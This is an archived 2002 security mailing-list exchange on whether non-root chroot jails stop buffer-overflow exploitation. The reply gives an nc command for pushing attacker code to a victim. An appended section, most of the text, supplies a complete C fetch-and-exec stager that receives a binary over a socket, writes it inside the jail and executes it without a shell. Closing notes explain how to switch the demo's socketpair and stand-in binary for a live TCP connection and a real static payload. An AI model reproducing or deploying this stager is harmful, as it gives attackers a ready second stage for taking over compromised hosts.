Re: OT? Are chroots immune to buffer overflows?

From: Adam Lydick (lydickaw@hotmail.com)
Date: 05/22/02


From: "Adam Lydick" <lydickaw@hotmail.com>
To: Jason.Haar@trimble.co.nz, vuln-dev@securityfocus.com
Date: Wed, 22 May 2002 13:26:44 -0400

Sure it can. Just have the bootstrap code (the overflow) download a binary
from the attacker's machine:
'nc victim_machine portnum < evilcode'

Then exec the code. All the calls you need are in libc, which is almost
certainly loaded by the overflowed program. You have a chrooted, local
account that can still be used as a zombie for attacks or masking your true
location... (Or as a stepping stone for attacking more powerful accounts /
machines on the local network)

Adam

>From: Jason Haar <Jason.Haar@trimble.co.nz>
>To: vuln-dev@securityfocus.com
>Subject: OT? Are chroots immune to buffer overflows?
>Date: Wed, 22 May 2002 15:48:16 +1200
>
>[note: my question is WRT non-root chrooted jails - we all know about
>chroot'ing root processes!]
>
>Most buffer overflows I've seen attempt to infiltrate the system enough to
>run /bin/sh. In chroot'ed environments, /bin/sh doesn't (shouldn't!) exist -
>so they fail.
>
>Is it as simple as that? As 99.999% of the system binaries aren't available
>in the jail, can a buffer overflow ever work?
>
>--
>Cheers
>
>Jason Haar
>
>Information Security Manager
>Trimble Navigation Ltd.
>Phone: +64 3 9635 377 Fax: +64 3 9635 417
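The "download a binary, then exec it with nothing but libc" stage that Adam describes, written out as an added example (this is my own illustration, not code from either poster). To keep it runnable offline, the attacker's connection is simulated with a socketpair() instead of the real `nc` session, a copy of /bin/true (or /usr/bin/true) stands in for the attacker's evilcode, and a mkdtemp() directory under /tmp stands in for a writable spot inside the jail; all three are assumptions of the demo, as are the function names. Note what the second stage needs and does not need: open/read/write/fchmod/fork/execve from libc, no /bin/sh, no system(). What it does need in a real jail is a writable directory on a filesystem that is not mounted noexec, and a payload that is statically linked, since the jail will not contain ld.so or libc for the new process either.

```c
/* Added example, not from the original thread: a libc-only "fetch and exec"
 * second stage of the kind an overflow payload would run inside a non-root
 * chroot that has no /bin/sh. Assumptions: a socketpair() stands in for the
 * attacker's TCP connection, /bin/true stands in for the attacker's binary,
 * and a mkdtemp() directory under /tmp stands in for the jail's writable dir. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Copy fd_in to fd_out until EOF. Returns bytes copied, or -1 on error. */
static long pump(int fd_in, int fd_out) {
    char buf[4096];
    long total = 0;
    for (;;) {
        ssize_t n = read(fd_in, buf, sizeof buf);
        if (n < 0) return -1;
        if (n == 0) return total;
        for (ssize_t off = 0; off < n; ) {
            ssize_t w = write(fd_out, buf + off, (size_t)(n - off));
            if (w < 0) return -1;
            off += w;
        }
        total += n;
    }
}

/* Attacker side ('nc victim portnum < evilcode'): stream `path` over `sock`. */
long attacker_send(int sock, const char *path) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    long n = pump(fd, sock);
    close(fd);
    return n;
}

/* Victim side, i.e. what the overflow's bootstrap code does: receive the
 * binary into dir/stage2, mark it executable, execve it, and report the
 * child's exit status (-1 on any failure). Only libc calls are used.
 * argv0 is what the payload expects to see as argv[0]; it matters for
 * multi-call binaries such as busybox, where /bin/true may be a symlink. */
int victim_fetch_and_exec(int sock, const char *dir, const char *argv0) {
    char path[4096];
    snprintf(path, sizeof path, "%s/stage2", dir);
    int out = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0700);
    if (out < 0) return -1;
    long got = pump(sock, out);
    if (got <= 0) { close(out); return -1; }
    fchmod(out, 0700);
    close(out);                         /* close before exec, else ETXTBSY */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { (char *)argv0, NULL };
        char *envp[] = { NULL };
        execve(path, argv, envp);
        _exit(127);                     /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Pick a stand-in payload that exists on this host. */
const char *find_true(void) {
    return access("/bin/true", X_OK) == 0 ? "/bin/true" : "/usr/bin/true";
}

/* End-to-end run: attacker in a child process, victim in the parent.
 * Returns the staged payload's exit status, or -1 if the stage failed. */
int simulate(const char *payload_path, const char *argv0) {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    char dir[] = "/tmp/jailXXXXXX";      /* stand-in for a writable jail dir */
    if (!mkdtemp(dir)) return -1;
    pid_t pid = fork();
    if (pid == 0) {                       /* attacker */
        close(sv[1]);
        attacker_send(sv[0], payload_path);
        _exit(0);                         /* closing sv[0] gives the victim EOF */
    }
    close(sv[0]);
    int rc = victim_fetch_and_exec(sv[1], dir, argv0);
    close(sv[1]);
    waitpid(pid, NULL, 0);
    char staged[4096];
    snprintf(staged, sizeof staged, "%s/stage2", dir);
    unlink(staged);
    rmdir(dir);
    return rc;
}

int main(void) {
    printf("staged payload exit status: %d\n", simulate(find_true(), "true"));
    return 0;
}
```

Running it prints exit status 0: the bytes arrived over the socket, were written to the jail, and ran, with no shell involved at any point. Swap the socketpair for a connect()ed TCP socket and /bin/true for a static binary and this is exactly the "zombie inside the jail" Adam describes.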
